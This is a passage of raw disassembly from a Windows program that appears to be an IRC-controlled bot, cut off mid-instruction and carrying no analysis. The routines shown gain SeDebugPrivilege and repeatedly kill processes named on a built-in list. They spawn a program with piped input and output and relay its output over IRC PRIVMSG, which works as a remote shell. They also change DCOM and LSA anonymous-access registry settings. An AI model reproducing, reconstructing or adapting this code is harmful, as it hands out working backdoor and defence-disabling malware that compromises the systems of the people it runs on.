sub_4192E0+13Dj push [ebp+var_8] lea eax, [ebp+var_218] push offset aTotalUsersFoun ; "Total users found: %d." push eax call sub_41B886 push esi lea eax, [ebp+var_218] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 20h xor eax, eax cmp [ebp+var_C], esi pop edi pop esi setz al pop ebx leave retn sub_4192E0 endp ; =============== S U B R O U T I N E ======================================= sub_419460 proc near ; CODE XREF: sub_418A99+41p ; sub_418C8F+69p ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov ecx, 858h cmp eax, ecx ja loc_419512 jz loc_41950B cmp eax, 7Bh ja short loc_4194D7 jz short loc_4194CD cmp eax, 5 jz short loc_4194C3 cmp eax, 8 jz short loc_4194B9 cmp eax, 32h jz short loc_4194AF cmp eax, 35h jz short loc_4194A5 cmp eax, 57h jnz loc_419561 push offset aInvalidParamet ; "Invalid parameter." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194A5: ; CODE XREF: sub_419460+30j push offset aServerNameNotF ; "Server name not found." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194AF: ; CODE XREF: sub_419460+2Bj push offset aThisNetworkReq ; "This network request is not supported." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194B9: ; CODE XREF: sub_419460+26j push offset aNotEnoughMemor ; "Not enough memory." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194C3: ; CODE XREF: sub_419460+21j push offset aAccessDenied_ ; "Access denied." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194CD: ; CODE XREF: sub_419460+1Cj push offset aTheNameIsInval ; "The name is invalid." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194D7: ; CODE XREF: sub_419460+1Aj sub eax, 7Ch jz short loc_419504 sub eax, 7C8h jz short loc_4194FD dec eax jz short loc_4194F3 dec eax jnz short loc_419561 push offset aDuplicateShare ; "Duplicate share name." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194F3: ; CODE XREF: sub_419460+84j push offset aInvalidForRedi ; "Invalid for redirected resource." jmp loc_419582 ; --------------------------------------------------------------------------- loc_4194FD: ; CODE XREF: sub_419460+81j push offset aDeviceOrDirect ; "Device or directory does not exist." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_419504: ; CODE XREF: sub_419460+7Aj push offset aLevelParameter ; "Level parameter is invalid." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_41950B: ; CODE XREF: sub_419460+11j push offset aAGeneralFailur ; "A general failure occurred in the netwo"... jmp short loc_419582 ; --------------------------------------------------------------------------- loc_419512: ; CODE XREF: sub_419460+Bj mov ecx, 8C5h cmp eax, ecx ja short loc_41954B jz short loc_419544 sub eax, 8ADh jz short loc_419576 dec eax dec eax jz short loc_41953D dec eax jz short loc_419536 dec eax dec eax jnz short loc_419561 push offset aTheOperationIs ; "The operation is allowed only on the pr"... jmp short loc_419582 ; --------------------------------------------------------------------------- loc_419536: ; CODE XREF: sub_419460+C9j push offset aTheUserAccount ; "The user account already exists." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_41953D: ; CODE XREF: sub_419460+C6j push offset aTheGroupAlread ; "The group already exists." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_419544: ; CODE XREF: sub_419460+BBj push offset aThePasswordIsS ; "The password is shorter than required ("... jmp short loc_419582 ; --------------------------------------------------------------------------- loc_41954B: ; CODE XREF: sub_419460+B9j sub eax, 8CAh jz short loc_41957D sub eax, 17h jz short loc_419576 sub eax, 25h jz short loc_41956F sub eax, 29h jz short loc_419568 loc_419561: ; CODE XREF: sub_419460+35j ; sub_419460+87j ... push offset aAnUnknownErr_0 ; "An unknown error occurred." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_419568: ; CODE XREF: sub_419460+FFj push offset aTheComputerNam ; "The computer name is invalid." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_41956F: ; CODE XREF: sub_419460+FAj push offset aShareNotFound_ ; "Share not found." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_419576: ; CODE XREF: sub_419460+C2j ; sub_419460+F5j push offset aTheUserNameCou ; "The user name could not be found." jmp short loc_419582 ; --------------------------------------------------------------------------- loc_41957D: ; CODE XREF: sub_419460+F0j push offset aNetworkConnect ; "Network connection not found." loc_419582: ; CODE XREF: sub_419460+40j ; sub_419460+4Aj ... push offset dword_4DB270 call sub_41B886 pop ecx mov eax, offset dword_4DB270 pop ecx retn sub_419460 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419594 proc near ; CODE XREF: sub_401ACD+4782p var_718 = byte ptr -718h var_318 = byte ptr -318h var_108 = byte ptr -108h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 718h push esi push 200h push [ebp+arg_0] lea eax, [ebp+var_718] push eax call sub_41D834 add esp, 0Ch lea eax, [ebp+arg_0] mov esi, 108h push eax lea eax, [ebp+var_108] push eax mov [ebp+arg_0], esi call dword_4270C0 ; GetComputerNameA lea eax, [ebp+var_108] push esi push eax lea eax, [ebp+var_318] push eax call sub_41D834 lea eax, [ebp+var_718] push eax call sub_41D817 add esp, 10h shl eax, 1 push eax lea eax, [ebp+var_718] push eax lea eax, [ebp+var_318] push 0 push eax push 0 call ds:dword_4CB664 test eax, eax jnz short loc_419624 mov esi, offset dword_4DB06C push offset unk_439D84 push esi call sub_41B886 pop ecx pop ecx jmp short loc_41964D ; --------------------------------------------------------------------------- loc_419624: ; CODE XREF: sub_419594+7Aj lea ecx, [ebp+var_718] push ecx lea ecx, [ebp+var_318] push ecx push eax call sub_419460 pop ecx mov esi, offset dword_4DB06C push eax push offset dword_439D58 push esi call sub_41B886 add esp, 14h loc_41964D: ; CODE XREF: sub_419594+8Ej mov eax, esi pop esi leave retn sub_419594 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419652 proc near ; CODE XREF: sub_416F1B+45p ; sub_416F1B+166p ... var_14 = dword ptr -14h var_10 = byte ptr -10h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 14h lea eax, [ebp+var_4] push eax push 28h call dword_4270F8 ; GetCurrentProcess push eax call ds:dword_4CB638 ; OpenProcessToken test eax, eax jnz short loc_419671 leave retn ; --------------------------------------------------------------------------- loc_419671: ; CODE XREF: sub_419652+1Bj lea eax, [ebp+var_10] push esi push eax xor esi, esi push [ebp+arg_0] push esi call ds:dword_4CB610 ; LookupPrivilegeValueA test eax, eax jz short loc_4196AF cmp [ebp+arg_4], esi mov [ebp+var_14], 1 jz short loc_419698 or [ebp+var_8], 2 jmp short loc_41969C ; --------------------------------------------------------------------------- loc_419698: ; CODE XREF: sub_419652+3Ej and [ebp+var_8], 0FFFFFFFDh loc_41969C: ; CODE XREF: sub_419652+44j push esi push esi lea eax, [ebp+var_14] push esi push eax push esi push [ebp+var_4] call ds:dword_4CB6C0 ; AdjustTokenPrivileges mov esi, eax loc_4196AF: ; CODE XREF: sub_419652+32j push [ebp+var_4] call dword_427068 ; CloseHandle mov eax, esi pop esi leave retn sub_419652 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4196BD proc near ; CODE XREF: sub_401ACD+7916p ; sub_4198EC+74p ... var_554 = byte ptr -554h var_354 = dword ptr -354h var_350 = byte ptr -350h var_234 = byte ptr -234h var_130 = dword ptr -130h var_12C = byte ptr -12Ch var_128 = dword ptr -128h var_10C = byte ptr -10Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp sub esp, 554h push ebx push esi push edi push 49h xor ebx, ebx pop ecx xor eax, eax cmp ds:dword_4CB674, ebx lea edi, [ebp+var_12C] mov [ebp+var_130], ebx rep stosd mov ecx, 88h lea edi, [ebp+var_350] mov [ebp+var_354], ebx rep stosd jz loc_4198BC cmp ds:dword_4CB658, ebx jz loc_4198BC cmp ds:dword_4CB568, ebx jz loc_4198BC push 1 push offset aSedebugprivile ; "SeDebugPrivilege" call sub_419652 pop ecx pop ecx push ebx push 0Fh call ds:dword_4CB674 ; CreateToolhelp32Snapshot mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_8], edi jz loc_4198AF lea eax, [ebp+var_130] mov [ebp+var_130], 128h push eax push edi call ds:dword_4CB658 ; Process32First mov esi, dword_427068 test eax, eax jz loc_4198AA lea eax, [ebp+var_130] push eax push edi call ds:dword_4CB568 ; Process32Next test eax, eax jz loc_4198AA mov edi, dword_427084 mov ebx, 1F0FFFh loc_419781: ; CODE XREF: sub_4196BD+1E5j xor eax, eax cmp [ebp+arg_10], eax jz short loc_4197E8 mov [ebp+var_4], offset off_439DB0 loc_41978F: ; CODE XREF: sub_4196BD+F3j mov eax, [ebp+var_4] push dword ptr [eax] lea eax, [ebp+var_10C] push eax call dword_427184 ; lstrcmpi test eax, eax jz short loc_4197B7 add [ebp+var_4], 4 cmp [ebp+var_4], offset dword_439E10 jb short loc_41978F jmp loc_419890 ; --------------------------------------------------------------------------- loc_4197B7: ; CODE XREF: sub_4196BD+E6j push [ebp+var_128] push 0 push ebx call edi ; OpenProcess test eax, eax mov [ebp+var_4], eax jz loc_419890 push 0 push eax call dword_4270F0 ; TerminateProcess test eax, eax jnz loc_419890 loc_4197DE: ; CODE XREF: sub_4196BD+1B9j push [ebp+var_4] call esi ; CloseHandle jmp loc_419890 ; --------------------------------------------------------------------------- loc_4197E8: ; CODE XREF: sub_4196BD+C9j cmp [ebp+arg_C], eax jnz loc_41987B cmp [ebp+arg_4], eax jz loc_419890 push [ebp+var_128] push 8 call ds:dword_4CB674 ; CreateToolhelp32Snapshot cmp [ebp+arg_14], 0 mov [ebp+var_4], eax mov [ebp+var_354], 224h jz short loc_41983B lea ecx, [ebp+var_354] push ecx push eax call ds:dword_4CB514 ; Module32First push [ebp+var_128] test eax, eax jz short loc_419841 lea eax, [ebp+var_234] jmp short loc_419847 ; --------------------------------------------------------------------------- loc_41983B: ; CODE XREF: sub_4196BD+15Cj push [ebp+var_128] loc_419841: ; CODE XREF: sub_4196BD+174j lea eax, [ebp+var_10C] loc_419847: ; CODE XREF: sub_4196BD+17Cj push eax lea eax, [ebp+var_554] push offset aSD_0 ; " %s (%d)" push eax call sub_41B886 add esp, 10h lea eax, [ebp+var_554] push 1 push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h jmp loc_4197DE ; --------------------------------------------------------------------------- loc_41987B: ; CODE XREF: sub_4196BD+12Ej push [ebp+arg_C] lea eax, [ebp+var_10C] push eax call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_4198C3 loc_419890: ; CODE XREF: sub_4196BD+F5j ; sub_4196BD+10Aj ... lea eax, [ebp+var_130] push eax push [ebp+var_8] call ds:dword_4CB568 ; Process32Next test eax, eax jnz loc_419781 xor ebx, ebx loc_4198AA: ; CODE XREF: sub_4196BD+9Dj ; sub_4196BD+B3j push [ebp+var_8] call esi ; CloseHandle loc_4198AF: ; CODE XREF: sub_4196BD+77j push ebx push offset aSedebugprivile ; "SeDebugPrivilege" call sub_419652 pop ecx pop ecx loc_4198BC: ; CODE XREF: sub_4196BD+3Aj ; sub_4196BD+46j ... xor eax, eax loc_4198BE: ; CODE XREF: sub_4196BD+22Dj pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_4198C3: ; CODE XREF: sub_4196BD+1D1j push [ebp+var_128] push 0 push ebx call edi ; OpenProcess push [ebp+var_8] mov edi, eax call esi ; CloseHandle push 0 push edi call dword_4270F0 ; TerminateProcess test eax, eax jnz short loc_4198E7 push edi call esi ; CloseHandle jmp short loc_4198BC ; --------------------------------------------------------------------------- loc_4198E7: ; CODE XREF: sub_4196BD+223j push 1 pop eax jmp short loc_4198BE sub_4196BD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4198EC proc near ; DATA XREF: sub_401ACD+26CEo var_298 = byte ptr -298h var_98 = dword ptr -98h var_94 = byte ptr -94h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 298h mov eax, [ebp+arg_0] push esi push edi push 26h pop ecx mov esi, eax lea edi, [ebp+var_98] push offset unk_439FB0 rep movsd mov dword ptr [eax+94h], 1 lea eax, [ebp+var_298] push eax call sub_41B886 xor esi, esi pop ecx cmp [ebp+var_8], esi pop ecx jnz short loc_41994B push esi lea eax, [ebp+var_298] push [ebp+var_C] push eax lea eax, [ebp+var_94] push eax push [ebp+var_98] call sub_409A73 add esp, 14h loc_41994B: ; CODE XREF: sub_4198EC+3Dj push [ebp+var_10] lea eax, [ebp+var_94] push esi push esi push [ebp+var_C] push eax push [ebp+var_98] call sub_4196BD add esp, 18h test eax, eax jnz short loc_419973 push offset unk_439F8C jmp short loc_419978 ; --------------------------------------------------------------------------- loc_419973: ; CODE XREF: sub_4198EC+7Ej push offset unk_439F68 loc_419978: ; CODE XREF: sub_4198EC+85j lea eax, [ebp+var_298] push eax call sub_41B886 cmp [ebp+var_8], esi pop ecx pop ecx jnz short loc_4199AB push esi lea eax, [ebp+var_298] push [ebp+var_C] push eax lea eax, [ebp+var_94] push eax push [ebp+var_98] call sub_409A73 add esp, 14h loc_4199AB: ; CODE XREF: sub_4198EC+9Dj lea eax, [ebp+var_298] push eax call sub_4151AD push [ebp+var_14] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_4198EC endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_4199CA proc near ; CODE XREF: sub_401ACD+78B4p ; sub_40B232+53p arg_0 = dword ptr 4 push esi push edi push 1 pop edi push [esp+8+arg_0] push 0 push 1F0FFFh call dword_427084 ; OpenProcess mov esi, eax test esi, esi jz short loc_4199FC push 0 push esi call dword_4270F0 ; TerminateProcess test eax, eax jnz short loc_4199FC push esi xor edi, edi call dword_427068 ; CloseHandle loc_4199FC: ; CODE XREF: sub_4199CA+1Aj ; sub_4199CA+27j mov eax, edi pop edi pop esi retn sub_4199CA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_419A01 proc near ; DATA XREF: sub_401221+3CDo push esi xor esi, esi loc_419A04: ; CODE XREF: sub_419A01+1Ej push 1 push esi push esi push esi push esi push esi call sub_4196BD add esp, 18h push dword_439DAC call dword_427078 ; Sleep jmp short loc_419A04 sub_419A01 endp ; =============== S U B R O U T I N E ======================================= sub_419A21 proc near ; CODE XREF: sub_419A51+2Ap ; sub_419A89+7Ep ... mov eax, ds:dword_4DB8D8 push esi mov esi, dword_427068 cmp eax, 0FFFFFFFFh jz short loc_419A35 push eax call esi ; CloseHandle loc_419A35: ; CODE XREF: sub_419A21+Fj mov eax, ds:dword_4DB8E0 cmp eax, 0FFFFFFFFh jz short loc_419A42 push eax call esi ; CloseHandle loc_419A42: ; CODE XREF: sub_419A21+1Cj mov eax, ds:dword_4DB8D4 cmp eax, 0FFFFFFFFh jz short loc_419A4F push eax call esi ; CloseHandle loc_419A4F: ; CODE XREF: sub_419A21+29j pop esi retn sub_419A21 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419A51 proc near ; CODE XREF: sub_401ACD+7605p ; sub_415C5A+14Ap var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push [ebp+arg_0] call sub_41AFE0 pop ecx mov [ebp+var_4], eax lea ecx, [ebp+var_4] push 0 push ecx push eax push [ebp+arg_0] push ds:dword_4DB8DC call dword_4270E0 ; WriteFile test eax, eax jnz short loc_419A84 call sub_419A21 xor eax, eax leave retn ; --------------------------------------------------------------------------- loc_419A84: ; CODE XREF: sub_419A51+28j push 1 pop eax leave retn sub_419A51 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419A89 proc near ; CODE XREF: sub_419B10+D3p ; sub_419B10+F2p ... var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 200h push offset byte_43D808 push [ebp+arg_4] call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_419ACC push 7D0h call dword_427078 ; Sleep push [ebp+arg_8] lea eax, [ebp+var_200] push [ebp+arg_4] push offset aPrivmsgSS ; "PRIVMSG %s :%s\r" push eax call sub_41B886 add esp, 10h jmp short loc_419AE3 ; --------------------------------------------------------------------------- loc_419ACC: ; CODE XREF: sub_419A89+1Aj push [ebp+arg_8] lea eax, [ebp+var_200] push offset aS_2 ; "%s" push eax call sub_41B886 add esp, 0Ch loc_419AE3: ; CODE XREF: sub_419A89+41j lea eax, [ebp+var_200] push 0 push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_200] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send test eax, eax jg short loc_419B0C call sub_419A21 loc_419B0C: ; CODE XREF: sub_419A89+7Cj xor eax, eax leave retn sub_419A89 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419B10 proc near ; DATA XREF: sub_419C65+170o var_20C = byte ptr -20Ch var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 20Ch push ebx push esi push edi mov esi, 200h xor edi, edi mov ebx, offset dword_4DB8E4 loc_419B28: ; CODE XREF: sub_419B10+79j ; sub_419B10+DBj push esi lea eax, [ebp+var_20C] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_4] push edi push edi push eax lea eax, [ebp+var_20C] push esi push eax push ds:dword_4DB8D8 call dword_42718C ; PeekNamedPipe test eax, eax jz loc_419BF6 cmp [ebp+var_4], edi jnz short loc_419B8B lea eax, [ebp+var_8] push eax push ds:dword_4DB8D4 call dword_427188 ; GetExitCodeProcess test eax, eax jz short loc_419B81 cmp [ebp+var_8], 103h jnz loc_419C1A loc_419B81: ; CODE XREF: sub_419B10+62j push 0Ah call dword_427078 ; Sleep jmp short loc_419B28 ; --------------------------------------------------------------------------- loc_419B8B: ; CODE XREF: sub_419B10+4Ej xor eax, eax cmp [ebp+var_4], edi jbe short loc_419BA2 loc_419B92: ; CODE XREF: sub_419B10+90j cmp [ebp+eax+var_20C], 0Ah jz short loc_419BF0 inc eax cmp eax, [ebp+var_4] jb short loc_419B92 loc_419BA2: ; CODE XREF: sub_419B10+80j mov [ebp+var_4], esi loc_419BA5: ; CODE XREF: sub_419B10+E4j push esi lea eax, [ebp+var_20C] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_C] push edi push eax push [ebp+var_4] lea eax, [ebp+var_20C] push eax push ds:dword_4DB8D8 call dword_4270E8 ; ReadFile test eax, eax jz short loc_419C42 lea eax, [ebp+var_20C] push eax push ebx push ds:dword_4DB918 call sub_419A89 add esp, 0Ch jmp loc_419B28 ; --------------------------------------------------------------------------- loc_419BF0: ; CODE XREF: sub_419B10+8Aj inc eax mov [ebp+var_4], eax jmp short loc_419BA5 ; --------------------------------------------------------------------------- loc_419BF6: ; CODE XREF: sub_419B10+45j push offset unk_43A038 push ebx push ds:dword_4DB918 call sub_419A89 push [ebp+arg_0] call sub_40B413 add esp, 10h push 1 call dword_4270CC ; ExitThread loc_419C1A: ; CODE XREF: sub_419B10+6Bj call sub_419A21 push offset unk_43A010 push ebx push ds:dword_4DB918 call sub_419A89 push [ebp+arg_0] call sub_40B413 add esp, 10h push edi call dword_4270CC ; ExitThread loc_419C42: ; CODE XREF: sub_419B10+C3j push offset unk_439FE0 push ebx push ds:dword_4DB918 call sub_419A89 push [ebp+arg_0] call sub_40B413 add esp, 10h push edi call dword_4270CC ; ExitThread sub_419B10 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419C65 proc near ; CODE XREF: sub_401ACD+2508p ; sub_415C5A+99p var_378 = byte ptr -378h var_178 = byte ptr -178h var_74 = dword ptr -74h var_48 = dword ptr -48h var_44 = word ptr -44h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = byte ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 378h push ebx push esi push edi call sub_419A21 xor esi, esi lea eax, [ebp+var_178] push esi push eax push 104h push esi push offset dword_433C04 push esi call ds:dword_4CB710 ; SearchPathA test eax, eax jz loc_419D5F push 1 lea eax, [ebp+var_1C] pop ebx mov edi, dword_4270FC push esi push eax lea eax, [ebp+var_C] mov [ebp+var_1C], 0Ch push eax lea eax, [ebp+var_10] push eax mov [ebp+var_14], ebx mov [ebp+var_18], esi call edi ; CreatePipe test eax, eax jz loc_419D5F lea eax, [ebp+var_1C] push esi push eax lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax call edi ; CreatePipe test eax, eax jz loc_419D5F mov edi, dword_4270F8 push 3 push esi push esi push offset dword_4DB8DC call edi ; GetCurrentProcess push eax push [ebp+var_8] call edi ; GetCurrentProcess push eax call dword_4270F4 ; DuplicateHandle test eax, eax jz short loc_419D5F push 10h lea eax, [ebp+var_2C] push esi push eax call sub_41B590 push 44h lea eax, [ebp+var_74] pop edi push edi push esi push eax call sub_41B590 mov eax, [ebp+var_4] add esp, 18h mov [ebp+var_3C], eax mov eax, [ebp+var_C] mov [ebp+var_38], eax mov [ebp+var_34], eax lea eax, [ebp+var_2C] mov [ebp+var_74], edi push eax lea eax, [ebp+var_74] push eax push esi push esi push esi push ebx push esi mov ebx, offset byte_43D808 push esi lea eax, [ebp+var_178] push ebx push eax mov [ebp+var_48], 101h mov [ebp+var_44], si call dword_42706C ; CreateProcessA test eax, eax jnz short loc_419D67 loc_419D5F: ; CODE XREF: sub_419C65+2Fj ; sub_419C65+5Cj ... or eax, 0FFFFFFFFh jmp loc_419E15 ; --------------------------------------------------------------------------- loc_419D67: ; CODE XREF: sub_419C65+F8j push [ebp+var_4] mov edi, dword_427068 call edi ; CloseHandle mov eax, [ebp+var_10] push [ebp+var_28] mov ds:dword_4DB8D8, eax mov eax, [ebp+var_8] mov ds:dword_4DB8E0, eax mov eax, [ebp+var_2C] mov ds:dword_4DB8D4, eax call edi ; CloseHandle mov eax, [ebp+arg_0] cmp [ebp+arg_4], esi mov ds:dword_4DB918, eax jz short loc_419DA1 push [ebp+arg_4] jmp short loc_419DA2 ; --------------------------------------------------------------------------- loc_419DA1: ; CODE XREF: sub_419C65+135j push ebx loc_419DA2: ; CODE XREF: sub_419C65+13Aj push offset dword_4DB8E4 call sub_41B886 pop ecx pop ecx push esi push 0Ah push offset unk_43A09C call sub_40B0F7 mov edi, eax mov ecx, [ebp+var_24] imul edi, 234h add esp, 0Ch mov dword_43E598[edi], ecx lea ecx, [ebp+var_30] push ecx push esi push eax push offset sub_419B10 push esi push esi call dword_42707C ; CreateThread cmp eax, esi mov dword_43E5A4[edi], eax jnz short loc_419E13 call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_378] push offset unk_43A068 push eax call sub_41B886 lea eax, [ebp+var_378] push eax call sub_4151AD add esp, 10h loc_419E13: ; CODE XREF: sub_419C65+185j xor eax, eax loc_419E15: ; CODE XREF: sub_419C65+FDj pop edi pop esi pop ebx leave retn sub_419C65 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419E1A proc near ; DATA XREF: sub_401ACD+2E0Co var_98 = dword ptr -98h var_94 = byte ptr -94h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 98h mov eax, [ebp+arg_0] push esi push edi push 26h pop ecx mov esi, eax lea edi, [ebp+var_98] rep movsd pop edi pop esi push [ebp+var_8] cmp [ebp+var_10], 0 mov dword ptr [eax+94h], 1 lea eax, [ebp+var_94] push [ebp+var_C] push eax push [ebp+var_98] jz short loc_419E61 call sub_419E7A jmp short loc_419E66 ; --------------------------------------------------------------------------- loc_419E61: ; CODE XREF: sub_419E1A+3Ej call sub_41A19E loc_419E66: ; CODE XREF: sub_419E1A+45j add esp, 10h push [ebp+var_14] call sub_40B413 pop ecx push 0 call dword_4270CC ; ExitThread sub_419E1A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_419E7A proc near ; CODE XREF: sub_419E1A+40p var_214 = byte ptr -214h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 214h push esi push edi xor edi, edi cmp ds:dword_4CB724, edi jnz loc_419FAC lea eax, [ebp+var_4] mov esi, 80000002h push eax push 2001Fh push edi push offset aSoftwareMicros ; "Software\\Microsoft\\OLE" push esi call ds:dword_4CB6C4 ; RegOpenKeyExA test eax, eax jnz short loc_419F05 mov ax, word_438E18 mov word ptr [ebp+var_8+2], ax lea eax, [ebp+var_8+2] push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_8+2] push eax push 1 push edi push offset aEnabledcom ; "EnableDCOM" push [ebp+var_4] call ds:dword_4CB678 ; RegSetValueExA test eax, eax jz short loc_419EE7 push offset dword_43A338 jmp short loc_419EEC ; --------------------------------------------------------------------------- loc_419EE7: ; CODE XREF: sub_419E7A+64j push offset dword_43A318 loc_419EEC: ; CODE XREF: sub_419E7A+6Bj lea eax, [ebp+var_214] push eax call sub_41B886 pop ecx pop ecx push [ebp+var_4] call ds:dword_4CB630 ; RegCloseKey jmp short loc_419F18 ; --------------------------------------------------------------------------- loc_419F05: ; CODE XREF: sub_419E7A+36j lea eax, [ebp+var_214] push offset dword_43A2E8 push eax call sub_41B886 pop ecx pop ecx loc_419F18: ; CODE XREF: sub_419E7A+89j cmp [ebp+arg_C], edi jnz short loc_419F37 push 1 lea eax, [ebp+var_214] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_419F37: ; CODE XREF: sub_419E7A+A1j lea eax, [ebp+var_214] push eax call sub_4151AD pop ecx lea eax, [ebp+var_4] push eax push 0F003Fh push edi push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa" push esi call ds:dword_4CB6C4 ; RegOpenKeyExA test eax, eax jnz short loc_419FA5 lea eax, [ebp+var_8] push 4 push eax push 4 push edi push offset aRestrictanonym ; "restrictanonymous" push [ebp+var_4] mov [ebp+var_8], 1 call ds:dword_4CB678 ; RegSetValueExA test eax, eax jz short loc_419F87 push offset dword_43A298 jmp short loc_419F8C ; --------------------------------------------------------------------------- loc_419F87: ; CODE XREF: sub_419E7A+104j push offset dword_43A264 loc_419F8C: ; CODE XREF: sub_419E7A+10Bj lea eax, [ebp+var_214] push eax call sub_41B886 pop ecx pop ecx push [ebp+var_4] call ds:dword_4CB630 ; RegCloseKey jmp short loc_419FBF ; --------------------------------------------------------------------------- loc_419FA5: ; CODE XREF: sub_419E7A+E2j push offset dword_43A228 jmp short loc_419FB1 ; --------------------------------------------------------------------------- loc_419FAC: ; CODE XREF: sub_419E7A+13j push offset dword_43A1F8 loc_419FB1: ; CODE XREF: sub_419E7A+130j lea eax, [ebp+var_214] push eax call sub_41B886 pop ecx pop ecx loc_419FBF: ; CODE XREF: sub_419E7A+129j cmp [ebp+arg_C], edi jnz short loc_419FDE push 1 lea eax, [ebp+var_214] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_419FDE: ; CODE XREF: sub_419E7A+148j lea eax, [ebp+var_214] push eax call sub_4151AD cmp ds:dword_4CB74C, edi pop ecx jnz loc_41A159 push ebx mov [ebp+var_4], edi mov [ebp+var_14], edi mov [ebp+var_C], edi loc_41A001: ; CODE XREF: sub_419E7A+2C3j lea eax, [ebp+var_C] push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_4] push eax lea eax, [ebp+var_8] push 0FFFFFFFFh push eax push 1F6h push edi call ds:dword_4CB598 cmp eax, edi mov [ebp+var_10], eax jz short loc_41A09E cmp eax, 0EAh jz short loc_41A09E mov esi, offset off_43A0C0 loc_41A032: ; CODE XREF: sub_419E7A+21Dj push dword ptr [esi] push edi call sub_418C6C pop ecx pop ecx push dword ptr [esi] test eax, eax jnz short loc_41A049 push offset dword_43A1D4 jmp short loc_41A04E ; --------------------------------------------------------------------------- loc_41A049: ; CODE XREF: sub_419E7A+1C6j push offset dword_43A1A8 loc_41A04E: ; CODE XREF: sub_419E7A+1CDj lea eax, [ebp+var_214] push 200h push eax call sub_41B980 add esp, 10h cmp [ebp+arg_C], edi jnz short loc_41A081 push 1 lea eax, [ebp+var_214] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A081: ; CODE XREF: sub_419E7A+1EBj lea eax, [ebp+var_214] push eax call sub_4151AD add esi, 8 pop ecx cmp esi, offset dword_43A0E0 jb short loc_41A032 jmp loc_41A136 ; --------------------------------------------------------------------------- loc_41A09E: ; CODE XREF: sub_419E7A+1AAj ; sub_419E7A+1B1j mov esi, [ebp+var_8] push 1 pop ebx cmp 